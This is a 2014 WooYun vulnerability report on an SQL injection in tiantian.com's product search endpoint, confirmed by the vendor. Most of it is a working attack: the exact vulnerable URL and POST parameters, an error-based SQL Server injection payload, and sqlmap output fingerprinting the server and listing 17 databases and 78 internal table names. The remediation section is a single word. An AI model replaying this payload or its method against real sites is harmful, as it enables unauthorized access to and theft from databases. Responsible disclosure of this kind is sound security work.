当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-060774

漏洞标题:天天团购主站post注入

相关厂商:tiantian.com

漏洞作者: 疯子

提交时间:2014-05-15 10:55

修复时间:2014-06-29 10:56

公开时间:2014-06-29 10:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-15: 细节已通知厂商并且等待厂商处理中
2014-05-15: 厂商已经确认,细节仅向厂商公开
2014-05-25: 细节向核心白帽子及相关领域专家公开
2014-06-04: 细节向普通白帽子公开
2014-06-14: 细节向实习白帽子公开
2014-06-29: 细节向公众公开

简要描述:

天天团购主站post注入

详细说明:

测试发现主站存在一处很隐秘的注入,听说天天有礼物就来了,你们懂的!
http://www.tiantian.com/products/search/index?Ajax_CallBack=true
post:Ajax_CallBackType=BizControls.common.ProductControl&Ajax_CallBackMethod=GetActionJson&Ajax_CallBackArgument0=j002355&Ajax_CallBackArgument1=1&Ajax_CallBackArgument2=1397

漏洞证明:

sqlmap identified the following injection points with a total of 412 HTTP(s) requests:
---
Place: POST
Parameter: Ajax_CallBackArgument0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: Ajax_CallBackType=BizControls.common.ProductControl&Ajax_CallBackMethod=GetActionJson&Ajax_CallBackArgument0=j002355') AND 6600=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (6600=6600) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(99)+CHAR(117)+CHAR(113))) AND ('KRzD'='KRzD&Ajax_CallBackArgument1=1&Ajax_CallBackArgument2=1397
---
web server operating system: Windows Vista
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: Ajax_CallBackArgument0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: Ajax_CallBackType=BizControls.common.ProductControl&Ajax_CallBackMethod=GetActionJson&Ajax_CallBackArgument0=j002355') AND 6600=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (6600=6600) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(99)+CHAR(117)+CHAR(113))) AND ('KRzD'='KRzD&Ajax_CallBackArgument1=1&Ajax_CallBackArgument2=1397
---
web server operating system: Windows Vista
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
available databases [17]:
[*] CPS_Log
[*] CPS_Union
[*] DBAdmin
[*] master
[*] model
[*] msdb
[*] newsite
[*] NewSite_Action
[*] NewSite_Archive
[*] NewSite_Biz
[*] NewSite_His
[*] NewSite_Wireless
[*] SiteBase
[*] tempdb
[*] tuan_sub
[*] WMSys_SKU_sub
[*] WMSys_sub
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: Ajax_CallBackArgument0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: Ajax_CallBackType=BizControls.common.ProductControl&Ajax_CallBackMethod=GetActionJson&Ajax_CallBackArgument0=j002355') AND 6600=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (6600=6600) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(99)+CHAR(117)+CHAR(113))) AND ('KRzD'='KRzD&Ajax_CallBackArgument1=1&Ajax_CallBackArgument2=1397
---
web server operating system: Windows Vista
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
Database: NewSite_Action
[78 tables]
+----------------------------------------+
| Action_Activity |
| Action_ColifNvShen |
| Action_Coupons_RecevieRecord |
| Action_DonateOrder |
| Action_FLRecode |
| Action_InviteCountRecord |
| Action_InviteRecord |
| Action_InviteRecordActivity |
| Action_InviteRecordUsed |
| Action_OrderBuyList |
| Action_OrderInfoList |
| Action_OrderMessage |
| Action_OrderProduct |
| Action_OrderStepPrice |
| Action_RechargeCard |
| Action_SignCountRecord |
| Action_SignLotteryInfo |
| Action_SignLotteryRecord |
| Action_SignRecord |
| Action_SignUpdateSeriesCountLog |
| Action_Statistics_User |
| Action_UsedRecord |
| CMS_NewsChannel |
| CMS_NewsInfo |
| CMS_News_Extend |
| Coupon_ReturnCoupon_Record |
| FanLi_Commision |
| FanLi_OrderInfo |
| FanLi_SiteInfo |
| FanLi_SiteTypeInfo |
| FanLi_TypeInfo |
| Favourable_ActivityList |
| Favourable_ActivityType |
| Favourable_Activity_Extend |
| MSpeer_conflictdetectionconfigrequest |
| MSpeer_conflictdetectionconfigresponse |
| MSpeer_lsns |
| MSpeer_originatorid_history |
| MSpeer_request |
| MSpeer_response |
| MSpeer_topologyrequest |
| MSpeer_topologyresponse |
| MSpub_identity_range |
| Order_ActivityList |
| Promotion_Active |
| Promotion_ActiveRule |
| Promotion_InstanceData |
| Promotion_Rule |
| Promotion_RuleItem |
| Promotion_RuleItem_Relation |
| Promotion_RuleObject |
| Promotion_RuleValue |
| Rule_GiftRecond |
| Rule_RuleChildType |
| Rule_RuleCondition |
| Rule_RuleMain |
| Rule_RuleMainType |
| Rule_RuleReward |
| SKU_Product_Recommend |
| UserInfo_Extend |
| Vote_ActionInfo |
| Vote_Base_ProductImgage |
| Vote_Base_ProductInfo |
| Vote_Count |
| Vote_Log |
| Vote_Result |
| syncobj_0x3237343046304441 |
| sysarticlecolumns |
| sysarticles |
| sysarticleupdates |
| sysdiagrams |
| sysextendedarticlesview |
| syspublications |
| sysreplservers |
| sysschemaarticles |
| syssubscriptions |
| systranschemas |
| vPromotion_RuleItem_Relation |
+----------------------------------------+

修复方案:

过滤

版权声明:转载请注明来源 疯子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-05-15 12:49

厂商回复:

联系方式

最新状态:

暂无


漏洞评价:

评论